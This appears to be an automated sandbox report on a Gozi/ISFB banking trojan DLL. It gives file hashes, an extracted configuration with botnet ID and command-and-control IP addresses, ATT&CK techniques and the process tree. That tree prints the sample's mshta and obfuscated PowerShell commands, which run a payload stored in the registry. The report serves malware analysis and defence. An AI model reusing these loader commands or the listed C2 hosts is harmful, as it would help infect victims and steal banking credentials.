gozi | 7ce0babea43a0eca93ed5458b77df1cd695f672e8dd784d8ff0af777b66e7865

Analysis

max time kernel
150s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
01/06/2023, 17:48

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

file.dll
Size

362KB
MD5

3969d9062eb2daef1872aaf898636f08
SHA1

7922117847dcda90de4d8fbaaa5613076b959115
SHA256

7ce0babea43a0eca93ed5458b77df1cd695f672e8dd784d8ff0af777b66e7865
SHA512

c88f6d7f3cea5dbc8341ad4a7f6c6fc197a6b9f30b807a2eb61ab9cf33d3f607f4ddd04e91eb461edf9842062319f60bbdf6d9f964f3fc20748c748734437bf4
SSDEEP

3072:QmNJTdnsnRNulFiOxyioF2XfSGXbR4cFekbhO6r253I0rSis6bGCKLb1TASh8mU+:2MtTX3hdrCk6bGRL5TASh8mUUJaM

Score

10^/10

gozi 20000 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

20000

chick.bing.com

http://79.132.129.207

http://94.247.42.106

http://94.247.42.79

http://185.212.44.76

http://45.155.249.200

http://45.155.250.216

Attributes

base_path
/zerotohero/
build
250257
exe_type
loader
extension
.asi
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

20000

chick.bing.com

http://79.132.135.249

http://45.155.249.47

http://31.214.157.160

http://45.155.250.55

http://45.11.180.140

http://45.155.250.217

http://45.155.249.49

Attributes

base_path
/zerotohero/
build
250257
exe_type
worker
extension
.asi
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2876 set thread context of 3172	2876	powershell.exe	45
PID 3172 set thread context of 3724	3172	Explorer.EXE	15
PID 3172 set thread context of 3964	3172	Explorer.EXE	40
PID 3172 set thread context of 4852	3172	Explorer.EXE	37
PID 3172 set thread context of 1132	3172	Explorer.EXE	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3192	regsvr32.exe
3192	regsvr32.exe
2876	powershell.exe
2876	powershell.exe
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3172	Explorer.EXE

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2876	powershell.exe
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3172	Explorer.EXE

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 1176 wrote to memory of 3192	1176	regsvr32.exe	86
PID 1176 wrote to memory of 3192	1176	regsvr32.exe	86
PID 1176 wrote to memory of 3192	1176	regsvr32.exe	86
PID 3756 wrote to memory of 2876	3756	mshta.exe	96
PID 3756 wrote to memory of 2876	3756	mshta.exe	96
PID 2876 wrote to memory of 3880	2876	powershell.exe	98
PID 2876 wrote to memory of 3880	2876	powershell.exe	98
PID 3880 wrote to memory of 744	3880	csc.exe	99
PID 3880 wrote to memory of 744	3880	csc.exe	99
PID 2876 wrote to memory of 1292	2876	powershell.exe	100
PID 2876 wrote to memory of 1292	2876	powershell.exe	100
PID 1292 wrote to memory of 3716	1292	csc.exe	101
PID 1292 wrote to memory of 3716	1292	csc.exe	101
PID 2876 wrote to memory of 3172	2876	powershell.exe	45
PID 2876 wrote to memory of 3172	2876	powershell.exe	45
PID 2876 wrote to memory of 3172	2876	powershell.exe	45
PID 2876 wrote to memory of 3172	2876	powershell.exe	45
PID 3172 wrote to memory of 3724	3172	Explorer.EXE	15
PID 3172 wrote to memory of 3724	3172	Explorer.EXE	15
PID 3172 wrote to memory of 3724	3172	Explorer.EXE	15
PID 3172 wrote to memory of 3724	3172	Explorer.EXE	15
PID 3172 wrote to memory of 3964	3172	Explorer.EXE	40
PID 3172 wrote to memory of 3964	3172	Explorer.EXE	40
PID 3172 wrote to memory of 3964	3172	Explorer.EXE	40
PID 3172 wrote to memory of 3964	3172	Explorer.EXE	40
PID 3172 wrote to memory of 4852	3172	Explorer.EXE	37
PID 3172 wrote to memory of 4852	3172	Explorer.EXE	37
PID 3172 wrote to memory of 4852	3172	Explorer.EXE	37
PID 3172 wrote to memory of 4852	3172	Explorer.EXE	37
PID 3172 wrote to memory of 1132	3172	Explorer.EXE	103
PID 3172 wrote to memory of 1132	3172	Explorer.EXE	103
PID 3172 wrote to memory of 1132	3172	Explorer.EXE	103
PID 3172 wrote to memory of 1132	3172	Explorer.EXE	103
PID 3172 wrote to memory of 1132	3172	Explorer.EXE	103
PID 3172 wrote to memory of 1132	3172	Explorer.EXE	103

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3724

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\file.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Windows\SysWOW64\regsvr32.exe
  /s C:\Users\Admin\AppData\Local\Temp\file.dll
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3192

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4852

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3964

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3172
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>B8uo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(B8uo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BAF9626B-D1BD-FCDC-2B8E-95F08FA29924\\\ReturnReply'));if(!window.flag)close()</script>"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyjhfnb -value gp; new-alias -name pdfcovu -value iex; pdfcovu ([System.Text.Encoding]::ASCII.GetString((cyjhfnb "HKCU:Software\AppDataLow\Software\Microsoft\BAF9626B-D1BD-FCDC-2B8E-95F08FA29924").DateTime))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bjuhqvaj\bjuhqvaj.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3880
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6DF.tmp" "c:\Users\Admin\AppData\Local\Temp\bjuhqvaj\CSC1658F99D730F4E35993378E13C47CA56.TMP"
        5⤵
        
        PID:744
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ahh41312\ahh41312.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1292
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7E8.tmp" "c:\Users\Admin\AppData\Local\Temp\ahh41312\CSC5E2905FCD7C744B384DEAFDBE8841E42.TMP"
        5⤵
        
        PID:3716
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:1132

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC6DF.tmp

Filesize
1KB

MD5
325f690a84f47cab71a0122f641b96f1

SHA1
df36644be070e89d3015981571ee2669a917dd28

SHA256
90bee39fb4ccc7d4823514bf5ea2d18cc58894adb034649bb2ce4cae6a25cc19

SHA512
d663687d1d48e1801285c0e160fa758022e82593c14bba1f5a1572b4f61393a09d165f77ebb0447ba0d6440f237a5293b739839184d28bc6d4148f8666bfae1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC7E8.tmp

Filesize
1KB

MD5
99601692dec553104280b74ed90d89f0

SHA1
0b15205424d8d8b6b27d5164a762ea159c0f76b2

SHA256
d69f14026b1ad96c543d974971e55c6db6460bdfd585c07bc3e76a01145a4430

SHA512
2b905812590c147cda6c2276cbd947a5e4c7dabf9c14f28ed5827cd7df8bf303f50f462bb0fae8e2273fcb33aed54687f08307d8bb62753733aafde09c8f8792

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1vu2wyd.rav.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ahh41312\ahh41312.dll

Filesize
3KB

MD5
671cd00716d022a0697d736fc425dada

SHA1
22f4503324473844269d17f55ed7db554dc25586

SHA256
501b526127701df561a766da45019895901964a9c7e6d7b71eafdf864a68eb11

SHA512
ed6788a7e00a31f0465c1377243cf7c452d3f224842f81d786aa9a77dcb5bb908584117c815d31131c99fa896e1d44d2d11667f75b9dcb9082d881cfec50525f

Download Submit
C:\Users\Admin\AppData\Local\Temp\bjuhqvaj\bjuhqvaj.dll

Filesize
3KB

MD5
ad9cf294bc1e79b07b631d41fadbd436

SHA1
efcfa9c9e5e5ed80d5def3b454e344cc9bf662a3

SHA256
425e36e462ee9b352f35c209f6dbda81f89aba3be5876508056a6458161d3a7c

SHA512
4f6365b33087d6b1908dbf445ea47bc7c496a71cc471a5fe7f746fc2ec310988d8557a7b0997361ab2f634f748ae0949ff3f55822ef7696ccd8e135a19018204

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ahh41312\CSC5E2905FCD7C744B384DEAFDBE8841E42.TMP

Filesize
652B

MD5
9a7249471caa9318ba96427b2b91bb3b

SHA1
00ad87f95f6868d104d9479a9c9f31cc0819f441

SHA256
1b6380f30dbce4574098715f62e98e1713230b1b92387520c0766ac4a59427ff

SHA512
a7a380900875a187353f43f40a4e4535cdc27bf91db4eedb3956a916304585064c1d399bcd86885db5bc0f3b7aeb00a3a143390e2443f79dbc2c1e1fe16bbb18

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ahh41312\ahh41312.0.cs

Filesize
402B

MD5
d50bf3e60a9cfaf2c8b31b678988e0db

SHA1
15648ee812871b03a3554017b442321ea3a99395

SHA256
7882b931033f673a6115e0668d39f95beb6894eb777dbf907205439fc2b00cf5

SHA512
6cf2ee3651fe7bc8da8b7cb0f129fa24fc4ebe895c9b730d5d87975b85b20376bbd9fe56cb45173e100a33da3d91084005fa40a6d3ec9623b093b51805b9d44a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ahh41312\ahh41312.cmdline

Filesize
369B

MD5
c3eb9907fe0fa32c34e34b30bcebfcb5

SHA1
9bae79f3859876c386f21d82d23246b37d13da96

SHA256
abc332edbbea9fc63b0958c868027c99f7c6706bb1fcf6ca6a21c6b8b276b0e2

SHA512
0ad41a20140bc840f0a56d3c0d2e0ad909e75ccb31a7afcb357b0f6242daeea8b7da93857e370b53f9116390431c0bf366d330ca7b22daa2e71006790e0ac953

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bjuhqvaj\CSC1658F99D730F4E35993378E13C47CA56.TMP

Filesize
652B

MD5
8f1f2b642154d115f372ba2556a93a2a

SHA1
742008f2dd192c88fe1f7c1f23b6b7909d3f089a

SHA256
ebd5004e934bad72a7e8be21b6a6e0b845f5de426cbb0b39020782ea6aafbbd5

SHA512
43fb3c97c41aa9c55397bd5b88e1ed4938123a31cd69670392bd5ea7c6eb34b6fbf46bca5550bdcf6ef22a1b90eb7b7d6ac85d057beed76035d13693de3c5e9a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bjuhqvaj\bjuhqvaj.0.cs

Filesize
396B

MD5
58e78014b39a46453f3956aa8d351e67

SHA1
f30d36b05b3b15d806bfa618a8db660395992f16

SHA256
dbe7eb523f8666192b4e0b9e136dfd68b9fd9c5c08f14cf8838088ae51f242d5

SHA512
6fa3d4bc671aee392843ba03e4a88f75ca4eb7da7d6fc8280f0afbc01a45993f32cbc779bacbd2061ceb37b0a5e3f0f66531aba5e431ddc9f96b0557f052b84c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bjuhqvaj\bjuhqvaj.cmdline

Filesize
369B

MD5
64cd260245f4402836686aa9fad48ed9

SHA1
a4453bdad9aa51096375c826754503acc9e4b603

SHA256
5a0ff80e223dd12667c23fbb9fc32401b991a0853a90f3908e4747b42c2de4d4

SHA512
1a0b8a700615facb4b6e95113c1b6f6d0cab5eb19a7d2c6c0bacf77fa811c78746195ed4d65be430e7e8199824ef3ee8132095828940625fb26721b433e8ef47

Download Submit
memory/1132-223-0x0000000001530000-0x00000000015C8000-memory.dmp

Filesize
608KB

Download
memory/1132-226-0x0000000001530000-0x00000000015C8000-memory.dmp

Filesize
608KB

Download
memory/2876-158-0x000001AB85910000-0x000001AB85920000-memory.dmp

Filesize
64KB

Download
memory/2876-191-0x000001AB9F930000-0x000001AB9F96C000-memory.dmp

Filesize
240KB

Download
memory/2876-159-0x000001AB85910000-0x000001AB85920000-memory.dmp

Filesize
64KB

Download
memory/2876-157-0x000001AB85910000-0x000001AB85920000-memory.dmp

Filesize
64KB

Download
memory/2876-147-0x000001AB87320000-0x000001AB87342000-memory.dmp

Filesize
136KB

Download
memory/3172-194-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

Filesize
4KB

Download
memory/3172-187-0x0000000008220000-0x00000000082C3000-memory.dmp

Filesize
652KB

Download
memory/3172-222-0x0000000008220000-0x00000000082C3000-memory.dmp

Filesize
652KB

Download
memory/3172-197-0x0000000008220000-0x00000000082C3000-memory.dmp

Filesize
652KB

Download
memory/3192-143-0x0000000002090000-0x000000000209D000-memory.dmp

Filesize
52KB

Download
memory/3192-133-0x00000000006D0000-0x00000000006DF000-memory.dmp

Filesize
60KB

Download
memory/3192-137-0x00000000006F0000-0x00000000006FE000-memory.dmp

Filesize
56KB

Download
memory/3192-142-0x00000000006C0000-0x00000000006CD000-memory.dmp

Filesize
52KB

Download
memory/3724-201-0x000001F296C00000-0x000001F296CA3000-memory.dmp

Filesize
652KB

Download
memory/3724-215-0x000001F296530000-0x000001F296531000-memory.dmp

Filesize
4KB

Download
memory/3724-216-0x000001F296C00000-0x000001F296CA3000-memory.dmp

Filesize
652KB

Download
memory/3964-206-0x000002D10C600000-0x000002D10C6A3000-memory.dmp

Filesize
652KB

Download
memory/3964-217-0x000002D10BC50000-0x000002D10BC51000-memory.dmp

Filesize
4KB

Download
memory/3964-218-0x000002D10C600000-0x000002D10C6A3000-memory.dmp

Filesize
652KB

Download
memory/4852-219-0x000001F72D260000-0x000001F72D261000-memory.dmp

Filesize
4KB

Download
memory/4852-220-0x000001F72D470000-0x000001F72D513000-memory.dmp

Filesize
652KB

Download
memory/4852-211-0x000001F72D470000-0x000001F72D513000-memory.dmp

Filesize
652KB

Download